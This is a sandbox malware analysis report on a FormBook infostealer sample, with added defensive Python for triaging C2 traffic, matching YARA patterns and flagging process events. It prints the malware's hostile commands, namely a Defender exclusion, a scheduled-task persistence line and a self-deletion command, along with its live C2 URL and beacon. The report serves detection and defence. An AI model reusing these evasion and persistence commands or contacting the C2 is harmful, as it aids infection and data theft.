
Windows Analysis Report QUOTATION.exe

Overview

General Information

Sample Name: QUOTATION.exe
Analysis ID: 532906
MD5: 213d8fd4b74e3b1122cfc1a9159aa579
SHA1: 3fcea21ca260c922f371877bef1cec0b2293f1e9
SHA256: 696ba286fa1d2d46b09dee92733f9ca34bfe3e58f50a440a3ec89f63bba76441
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • QUOTATION.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\QUOTATION.exe" MD5: 213D8FD4B74E3B1122CFC1A9159AA579)
    • powershell.exe (PID: 7120 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 5516 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp" MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 3180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • QUOTATION.exe (PID: 6728 cmdline: C:\Users\user\Desktop\QUOTATION.exe MD5: 213D8FD4B74E3B1122CFC1A9159AA579)
    • QUOTATION.exe (PID: 5372 cmdline: C:\Users\user\Desktop\QUOTATION.exe MD5: 213D8FD4B74E3B1122CFC1A9159AA579)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 3180 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
      • NETSTAT.EXE (PID: 5100 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
        • cmd.exe (PID: 6896 cmdline: /c del "C:\Users\user\Desktop\QUOTATION.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.purelai.store/p2r0/"], "decoy": ["armory-village.net", "gailgylee.store", "hyjqjd.com", "dgastudios.com", "freedomofspain.com", "coneofpositivity.com", "wesleyb.com", "cacciatorediteglie.com", "refatu.com", "apexfreightdispatch.com", "fichesdematerialisees.com", "hoopmetaverse.com", "gesogog.com", "mosaicelevatormonitoring.com", "mrstarrtutorsmath.com", "kebalunion.com", "xn--15qv36df6am25bt2p.top", "archedbeautynw.com", "glczklft.com", "zhejiang-huayang.com", "mariogriffinphoto.com", "metomecetefur.rest", "sabimode.com", "pityporg.online", "plumbinghelp411.com", "neontvplay.com", "hellofurb.com", "jamerah.com", "alarshllc.com", "secure2work.cloud", "wanderlustwallart.com", "altinayrent.com", "odishaparagliding.com", "jijijfiaf.xyz", "zaracentres.com", "shorthillsnjhomespecialists.com", "everdayevolution.net", "kpopyostore.com", "bitsandbuds.com", "dalstudio.net", "anh-law.com", "ecogreenhanukkah.com", "ittibrief.com", "itargetcampaigns.com", "abczqzhkmu.com", "dentistslexington.com", "searchinmetaverse.com", "mypharmatea.com", "omdeforoush.com", "bbtenzymes.com", "thefactologist.com", "mki-sb.com", "escrowtimeonline.com", "global-therm.com", "yourlifedesignjourney.com", "318donate.com", "montessori-academies.com", "virgotalk.com", "alvincjohnson.com", "hxcopymrerem.biz", "gslean.com", "darknessnft.com", "hummelconstrllc.com", "metaversefed.com"]}
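A triage helper for the configuration above, added here as an example (it is not part of the Joe Sandbox report). FormBook sends the same beacon path to the real C2 and to every decoy domain, so the path, not the domain, is the stable indicator; the 64 decoys are attacker-picked third-party sites and belong on a watch list, not a block list. CONFIG_JSON is a shortened copy of the extracted config (the C2 entry and four of the decoys; the full list drops in unchanged), and REQUESTS is a constructed log whose first entry is the GET captured in this report and whose remaining hosts are hypothetical.

```python
import json
from urllib.parse import urlsplit

# Shortened copy of the configuration extracted above: the single C2 entry and
# four of the 64 decoy domains. The full list can be pasted in unchanged.
CONFIG_JSON = """{"C2 list": ["www.purelai.store/p2r0/"],
 "decoy": ["armory-village.net", "gailgylee.store", "hyjqjd.com", "dgastudios.com"]}"""

# Constructed request log: (Host header, request target). The first entry is
# the GET captured in the report; the other hosts are hypothetical.
REQUESTS = [
    ("www.purelai.store", "/p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnX"),
    ("www.gailgylee.store", "/p2r0/?U2JXS=zl7ruCTqPiUCF1L"),
    ("wildcard.hostgator.com", "/p2r0/?U2JXS=zl7ruCTqPiUCF1L"),
    ("www.purelai.store", "/"),
    ("update.example.org", "/api/v1/ping"),
]


def _norm(host):
    """Lower-case, strip a trailing dot and a leading 'www.' so config entries
    and Host headers compare equal."""
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def parse_config(raw):
    """Return ({c2_host: beacon_path}, {decoy_host, ...})."""
    cfg = json.loads(raw)
    c2 = {}
    for entry in cfg["C2 list"]:
        host, _, path = entry.partition("/")      # entries carry no scheme: "host/path/"
        c2[_norm(host)] = "/" + path
    return c2, {_norm(d) for d in cfg["decoy"]}


def classify(host, target, c2, decoys):
    h, path = _norm(host), urlsplit(target).path
    if h in c2 and path.startswith(c2[h]):
        return "c2"          # real C2 with the beacon path: tasking/exfil channel
    if h in c2:
        return "c2-host"     # right host, unexpected path: still block
    if h in decoys:
        return "decoy"       # noise FormBook generates to hide the real C2
    if any(path.startswith(p) for p in c2.values()):
        return "path-only"   # beacon path on a host absent from this config
    return "unrelated"


def iocs(c2, decoys):
    """Block the C2 (cover both apex and www. at DNS), hunt on the path, and keep
    decoys separate: blocking them only adds noise."""
    return {
        "block": sorted(h + p for h, p in c2.items()),
        "hunt_path": sorted(set(c2.values())),
        "decoy_only": sorted(decoys),
    }


def triage(raw, requests):
    c2, decoys = parse_config(raw)
    return [(host, classify(host, target, c2, decoys)) for host, target in requests]


if __name__ == "__main__":
    for host, label in triage(CONFIG_JSON, REQUESTS):
        print(f"{label:10} {host}")
```

The third request reproduces the `wildcard.hostgator.com/p2r0/` string the report later finds in NETSTAT.EXE memory: a decoy domain parked at a hosting provider, reached with the same beacon path, which is why it is labelled `path-only` rather than `c2`.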

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | -
00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | strings:
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | strings:
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | -
00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | strings:
  • 0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x8927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x992a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(28 entries in the full table; only these are expanded)

Unpacked PEs

Source | Rule | Description | Author | Strings
17.0.QUOTATION.exe.400000.6.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | -
17.0.QUOTATION.exe.400000.6.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | strings:
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
17.0.QUOTATION.exe.400000.6.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | strings:
  • 0x17a49:$sqlite3step: 68 34 1C 7B E1
  • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
  • 0x17a78:$sqlite3text: 68 38 2A 90 C5
  • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
  • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
17.0.QUOTATION.exe.400000.6.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | -
17.0.QUOTATION.exe.400000.6.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | strings:
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(17 entries in the full table; only these are expanded)
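The hex strings listed above can be reused outside YARA, and two of them are worth reading as code. This is an added example, not part of the report or of either rule's distribution: it carries a subset of the strings, scans a constructed buffer for them, and decodes the JPCERT strings. All three of those are `68 xx xx xx xx`, i.e. `push imm32`; the names JPCERT gave them mark the immediates as the hashed identifiers FormBook pushes for sqlite3_step, sqlite3_column_text and sqlite3_column_blob when it resolves imports by hash rather than by name. `$sequence_0` is `add ecx,eax; rdtsc; sub eax,ecx; mov [ebp-4],eax`, the RDTSC timing check that the "detect virtualization through RDTSC time measurements" signature refers to. The detection threshold in `looks_like_formbook` is chosen for this example and is not either rule's own condition.

```python
import re
import struct

# Hex strings copied from the YARA hits above (Formbook_1 by Felix Bilstein,
# Formbook by JPCERT/CC); a subset only.
PATTERNS = {
    "sequence_0": "03 C8 0F 31 2B C1 89 45 FC",           # add ecx,eax; rdtsc; sub eax,ecx; mov [ebp-4],eax
    "sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",  # cmp al,'$'; je rel32; cmp al,'%'; je rel8
    "sequence_8": "3C 54 74 04 3C 74 75 F4",              # cmp al,'T'; je; cmp al,'t'; jne
    "sqlite3step": "68 34 1C 7B E1",                      # push 0xE17B1C34
    "sqlite3text": "68 38 2A 90 C5",                      # push 0xC5902A38
    "sqlite3blob": "68 53 D8 7F 8C",                      # push 0x8C7FD853
}


def hex_to_bytes(s):
    return bytes.fromhex(s)          # fromhex ignores the spaces


def compile_patterns(patterns):
    # YARA hex strings without wildcards are plain byte sequences; re.escape
    # makes them safe as a bytes regex so finditer reports every offset.
    return {name: re.compile(re.escape(hex_to_bytes(h))) for name, h in patterns.items()}


def scan(buf, compiled):
    """Return {name: [offsets]} for every pattern present in buf."""
    hits = {}
    for name, rx in compiled.items():
        offsets = [m.start() for m in rx.finditer(buf)]
        if offsets:
            hits[name] = offsets
    return hits


def push_imm32(hex_seq):
    """Decode a `68 xx xx xx xx` string to the 32-bit immediate it pushes."""
    b = hex_to_bytes(hex_seq)
    if len(b) != 5 or b[0] != 0x68:
        raise ValueError("not a push imm32 encoding")
    return struct.unpack("<I", b[1:])[0]


def api_hashes(patterns):
    """name -> pushed hash for the three JPCERT strings: the values FormBook
    hands its hash-based import resolver instead of function names."""
    return {n: push_imm32(h) for n, h in patterns.items() if n.startswith("sqlite3")}


def looks_like_formbook(hits):
    # Example threshold (not the rules' own conditions): all three sqlite3
    # hashes, or at least three of the code sequences.
    sqlite = {"sqlite3step", "sqlite3text", "sqlite3blob"} <= set(hits)
    seqs = sum(1 for n in hits if n.startswith("sequence_"))
    return sqlite or seqs >= 3


def build_sample():
    """Constructed dump: 0x90 filler with patterns planted at known offsets."""
    buf = bytearray(b"\x90" * 0x400)
    for off, name in ((0x10, "sequence_0"), (0x40, "sequence_0"), (0x100, "sqlite3step"),
                      (0x120, "sqlite3text"), (0x140, "sqlite3blob"), (0x200, "sequence_1")):
        pat = hex_to_bytes(PATTERNS[name])
        buf[off:off + len(pat)] = pat
    return bytes(buf)


if __name__ == "__main__":
    hits = scan(build_sample(), compile_patterns(PATTERNS))
    print(hits, looks_like_formbook(hits))
    for name, value in api_hashes(PATTERNS).items():
        print(f"{name}: 0x{value:08X}")
```

Against a real dump, pass the bytes of the region (for the listing above, the 00000018 or 00000013 `.sdmp` regions) in place of `build_sample()`; the offsets come back relative to the start of that buffer, which is the same convention the table uses.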

Sigma Overview

System Summary:

Sigma detected: Suspicius Add Task From User AppData Temp
Source: Process started | Author: frack113 | Data: Command / CommandLine / ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION.exe", ParentImage: C:\Users\user\Desktop\QUOTATION.exe, ParentProcessId: 6924, ProcessId: 5516
Sigma detected: Powershell Defender Exclusion
Source: Process started | Author: Florian Roth | Data: Command / CommandLine / ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION.exe", ParentImage: C:\Users\user\Desktop\QUOTATION.exe, ParentProcessId: 6924, ProcessId: 7120
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: the same process-creation event as the Powershell Defender Exclusion match (ProcessId 7120, ParentProcessId 6924)
Sigma detected: T1086 PowerShell Execution
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132829772743618324.7120.DefaultAppDomain.powershell
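The process tree and the Sigma matches describe one chain: the dropper excludes its drop path from Defender, registers a scheduled task from an XML file in Temp, is hollowed into a system binary that explorer.exe spawns, runs NETSTAT.EXE, and deletes the original file through cmd. The following is added detection logic, not Joe Sandbox's or any Sigma rule's code, run over constructed Sysmon-style process-creation records built from the tree above (Sysmon Event ID 1 field names). Two assumptions: cmd.exe's image path is taken as SysWOW64 because the report does not print it, and the last record is a hypothetical benign control (an admin excluding a vendor directory) to show where the user-profile check earns its keep. Note that the rules key on the Image field, not on the path inside the command line: WoW64 redirection turns a System32 command line into a SysWOW64 image, as the Sigma data above shows.

```python
import re

# Constructed Sysmon-style process-creation records (Event ID 1 field names)
# built from the process tree above. cmd.exe's image path is not given in the
# report; SysWOW64 is assumed. The last record is a benign control case.
EVENTS = [
    {"pid": 7120, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe"',
     "parent": r"C:\Users\user\Desktop\QUOTATION.exe"},
    {"pid": 5516, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp"',
     "parent": r"C:\Users\user\Desktop\QUOTATION.exe"},
    {"pid": 3180, "image": r"C:\Windows\SysWOW64\autoconv.exe",
     "cmdline": r"C:\Windows\SysWOW64\autoconv.exe", "parent": r"C:\Windows\Explorer.EXE"},
    {"pid": 5100, "image": r"C:\Windows\SysWOW64\NETSTAT.EXE",
     "cmdline": r"C:\Windows\SysWOW64\NETSTAT.EXE", "parent": r"C:\Users\user\Desktop\QUOTATION.exe"},
    {"pid": 6896, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'/c del "C:\Users\user\Desktop\QUOTATION.exe"', "parent": r"C:\Windows\SysWOW64\NETSTAT.EXE"},
    {"pid": 4242, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe Add-MpPreference -ExclusionPath "C:\Program Files\Vendor\agent"',
     "parent": r"C:\Windows\System32\cmd.exe"},
]

USER_PROFILE = re.compile(r"\\users\\[^\\]+\\", re.I)      # anything under C:\Users\<name>\
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe"}
EXCLUSION_RX = re.compile(r"add-mppreference.*?-exclusion(?:path|process|extension)\s+\"?([^\"]+)", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def r_defender_exclusion(ev):
    if basename(ev["image"]) not in {"powershell.exe", "pwsh.exe"}:
        return None
    m = EXCLUSION_RX.search(ev["cmdline"])
    if not m:
        return None
    # Excluding a path under a user profile is the high-signal variant: the
    # dropper whitelists its own drop location (lQdAGavApIJoo.exe here).
    return "defender_exclusion_userdir" if USER_PROFILE.search(m.group(1)) else "defender_exclusion"


def r_schtasks_from_temp(ev):
    c = ev["cmdline"].lower()
    if basename(ev["image"]) == "schtasks.exe" and "/create" in c and "/xml" in c \
            and "\\appdata\\local\\temp\\" in c:
        return "schtasks_xml_from_temp"
    return None


def r_cmd_del_from_nonshell(ev):
    # "cmd /c del" launched by something that is not a shell (NETSTAT.EXE here)
    # is how the injected payload removes the original dropper.
    if basename(ev["image"]) == "cmd.exe" and re.search(r"/c\s+del\s", ev["cmdline"], re.I) \
            and basename(ev["parent"]) not in SHELLS:
        return "delete_via_cmd_from_nonshell_parent"
    return None


def r_injection_chain(ev):
    img, parent = basename(ev["image"]), basename(ev["parent"])
    in_system_dir = any(d in ev["image"].lower() for d in ("\\syswow64\\", "\\system32\\"))
    if img == "netstat.exe" and USER_PROFILE.search(ev["parent"]):
        return "netstat_from_user_binary"
    # Low confidence on its own (explorer launches plenty of utilities); it
    # only earns weight next to the tags above.
    if parent == "explorer.exe" and in_system_dir and ev["cmdline"].strip().lower() == ev["image"].lower():
        return "explorer_spawns_bare_system_utility"
    return None


RULES = (r_defender_exclusion, r_schtasks_from_temp, r_cmd_del_from_nonshell, r_injection_chain)
HIGH = {"defender_exclusion_userdir", "schtasks_xml_from_temp", "delete_via_cmd_from_nonshell_parent"}


def run_rules(events):
    """Map pid -> list of tags raised for that event."""
    hits = {}
    for ev in events:
        tags = [t for t in (rule(ev) for rule in RULES) if t]
        if tags:
            hits[ev["pid"]] = tags
    return hits


def verdict(hits):
    strong = sum(t in HIGH for tags in hits.values() for t in tags)
    return "escalate" if strong >= 2 else "review" if strong == 1 else "none"


if __name__ == "__main__":
    h = run_rules(EVENTS)
    for pid, tags in h.items():
        print(pid, tags)
    print(verdict(h))
```

The benign control trips `defender_exclusion` but not the `_userdir` variant, so on its own it yields "none" and is left for review by other means; the sample's chain raises three strong tags and escalates.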

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook, the configuration listed under Malware Configuration above (C2 www.purelai.store/p2r0/ plus 64 decoy domains)
Multi AV Scanner detection for submitted file
Source: QUOTATION.exe | Virustotal: Detection: 40%
Source: QUOTATION.exe | ReversingLabs: Detection: 18%
Yara detected FormBook
Source: Yara match | File source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.purelai.store/p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnX | Avira URL Cloud: Label: malware
Source: www.purelai.store/p2r0/ | Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe | ReversingLabs: Detection: 18%
Antivirus or Machine Learning detection for unpacked file
Source: 17.0.QUOTATION.exe.400000.6.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.0.QUOTATION.exe.400000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.2.QUOTATION.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.0.QUOTATION.exe.400000.8.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Uses 32bit PE files
Source: QUOTATION.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: QUOTATION.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: netstat.pdbGCTL | source: QUOTATION.exe, 00000011.00000002.378505567.0000000000FA0000.00000040.00020000.sdmp
Source: Binary string: netstat.pdb | source: QUOTATION.exe, 00000011.00000002.378505567.0000000000FA0000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP | source: QUOTATION.exe, 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, QUOTATION.exe, 00000011.00000002.378732031.00000000010CF000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: QUOTATION.exe, QUOTATION.exe, 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, QUOTATION.exe, 00000011.00000002.378732031.00000000010CF000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\QUOTATION.exe | Code function: 4x nop then pop edi | 17_2_00416CEA
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop edi | 24_2_00746CEA

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.purelai.store
Source: C:\Windows\explorer.exe | Network Connect: 208.51.62.42 80
Uses netstat to query active network connections and open ports
Source: C:\Users\user\Desktop\QUOTATION.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.purelai.store/p2r0/
Source: global traffic | HTTP traffic detected: GET /p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnX HTTP/1.1 | Host: www.purelai.store | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
